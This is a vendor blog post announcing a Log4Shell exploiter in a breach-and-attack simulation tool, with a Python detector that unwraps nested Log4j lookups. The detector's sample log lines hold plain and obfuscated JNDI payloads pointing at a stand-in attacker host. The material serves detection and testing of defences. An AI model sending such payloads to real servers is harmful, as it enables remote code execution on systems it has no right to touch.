
Log4j Bringing You Down? Try Infection Monkey’s New Log4Shell Attack Simulation

Written by

The Infection Monkey team

February 14, 2022

What if you could see how a real cyberattack might unfold in your network? Imagine the insights you would gain into your security posture if you could safely and easily simulate the behavior of malicious actors before they hit your defenses. That’s what the Infection Monkey does. It turns mock malware loose in your environment to test what happens in a real-world attack. This allows you to use real data to evaluate how your environment stands up to an attack — rather than hypothetical scenarios and textbook suggestions.

Since December 2021, threat actors have been exploiting a software vulnerability in Apache Log4j 2, a popular Java library for logging error messages in applications. This Log4Shell vulnerability enables a remote attacker to run arbitrary code on devices running certain versions of Apache Log4j 2.

You may have taken all the recommended steps to protect your organization from Log4Shell exploits — now’s the time to put those to the test. We’ve added a Log4Shell exploiter to the Infection Monkey to help you not only make certain you’re protected but also find areas where you’re not.

For example, since your last remediation effort, someone could have accidentally deployed an old version of software that’s still vulnerable. Or maybe the IDS worked yesterday but is malfunctioning for some reason today. Also, do you have visibility into whether someone has attempted to exploit a vulnerability to propagate malicious code through your network?

New capability tests for Log4Shell vulnerabilities

To help you address this critical vulnerability, Guardicore (which is now part of Akamai) has added a new Log4Shell attack simulation capability to the Infection Monkey. 

Some versions of Apache Log4j, a Java logging framework, include a logging feature called “Message Lookup Substitution” that is enabled by default. The feature replaces certain special strings in a log message with dynamically generated values at the time of logging, and malicious actors can abuse it: if an attacker can control log messages or log message parameters, arbitrary code can be executed. The Infection Monkey’s Log4Shell exploiter simulates an attack in which a threat actor takes advantage of this vulnerability to propagate to a victim machine.

The Infection Monkey will attempt to exploit the Log4Shell vulnerability in the following services:

  • Apache Solr

  • Apache Tomcat

  • Logstash

Even if none of these services are running in your environment, running the Log4Shell exploiter offers a good way to test your IDS/IPS or EDR solutions. These solutions should detect that the Infection Monkey is attempting to exploit the Log4Shell vulnerability and raise an appropriate alert.
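The alert an IDS/IPS or EDR is expected to raise here hinges on recognizing Log4j lookup strings even when other lookups are nested around them. The following is an added example, not Infection Monkey code: it folds nested lookups the way Log4j 2 would before checking for a jndi lookup; the sample log lines and the attacker.example host are constructed.

```python
import re
# Innermost ${...} lookup (no nested braces), and the jndi lookup we alert on.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)

def fold_lookup(body):
    """Fold one innermost lookup body as Log4j 2 would, or return None if it
    must stay intact (jndi itself, or any lookup not modelled here)."""
    prefix, sep, value = body.partition(":")
    if prefix.lower() == "jndi":
        return None
    if ":-" in body:                # ${name:-default} fallback, e.g. ${::-j} -> "j"
        return body.split(":-", 1)[1]
    if sep and prefix.lower() == "lower":       # ${lower:J} -> "j"
        return value.lower()
    if sep and prefix.lower() == "upper":       # ${upper:d} -> "D"
        return value.upper()
    return None

def normalize(text, max_rounds=20):
    """Fold innermost lookups repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        changed = False
        def sub(m):
            nonlocal changed
            folded = fold_lookup(m.group(1))
            if folded is None:
                return m.group(0)               # keep unresolvable lookups verbatim
            changed = True
            return folded
        text = INNER_LOOKUP.sub(sub, text)
        if not changed:
            break
    return text

def detect_log4shell(line):
    """Return a finding dict for one log line or header value, or None if clean."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "host": m.group(2), "obfuscated": norm != line}

# Constructed sample lines (not real traffic): benign, plain lookup, nested lookup.
SAMPLE_LINES = [
    '10.0.0.5 - GET /solr/admin/cores HTTP/1.1 200 "Mozilla/5.0"',
    '10.0.0.9 - GET /solr/admin/cores HTTP/1.1 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - GET / HTTP/1.1 200 "${${lower:J}${::-n}${upper:d}i:${lower:LDAP}://attacker.example:1389/a}"',
]
```

Matching on the raw string alone would miss the third sample line; normalizing first is what lets the same rule fire on both the plain and the nested form.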

At Guardicore, we believe security is an ongoing activity. That’s why we developed the Infection Monkey, a free, open source breach and attack simulation (BAS) platform. It allows you to easily and safely simulate attacks so that you can continuously test and evaluate your security posture. By enabling you to quickly simulate an attacker in your environment, the Infection Monkey helps you validate existing controls and identify how attackers might exploit your current network security gaps.

Download the latest version of the Infection Monkey.
